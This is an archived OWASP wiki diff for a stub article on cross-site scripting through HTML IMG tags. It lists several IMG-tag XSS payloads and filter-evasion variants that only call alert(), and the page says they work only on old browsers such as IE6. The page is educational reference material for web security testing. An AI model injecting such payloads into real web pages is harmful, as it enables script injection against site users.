This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Script in IMG tags"
Weilin Zhong (talk | contribs) |
(Add positive test result) |
||
(5 intermediate revisions by 4 users not shown) | |||
Line 1: | Line 1: | ||
− | |||
− | |||
− | |||
==Description== | ==Description== | ||
+ | It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP. | ||
==Examples == | ==Examples == | ||
+ | The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.<br><br> | ||
+ | |||
+ | <IMG SRC="javascript:alert('Vulnerable');"><br> | ||
+ | <IMG SRC=javascript:alert('XSS')><br> | ||
+ | <IMG SRC=JaVaScRiPt:alert('XSS')><br> | ||
+ | <IMG SRC=javascript:alert("XSS")><br> | ||
+ | <IMG SRC=`javascript:alert("RSnake says, <br> | ||
+ | 'XSS'")`><br > | ||
+ | <IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br> | ||
+ | <IMG <br> | ||
+ | SRC=javascript:alert(String.fromCharCode(88,83,83))><br> | ||
+ | <IMG <br> SRC=javascript:alert('XSS')><br> | ||
==Related Threats== | ==Related Threats== |
Latest revision as of 13:11, 19 May 2015
Description
It is possible for an attacker to execute JavaScript via HTML IMG tags. This is also referred to as XSS (Cross-Site Scripting). However, this type of attack is no longer possible on modern browsers. It has been tested as working on Internet Explorer (IE) 6 running on Windows XP.
Examples
The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.
<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=javascript:alert('XSS')>
Related Threats
Related Attacks
Related Vulnerabilities
Related Countermeasures
Categories
This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.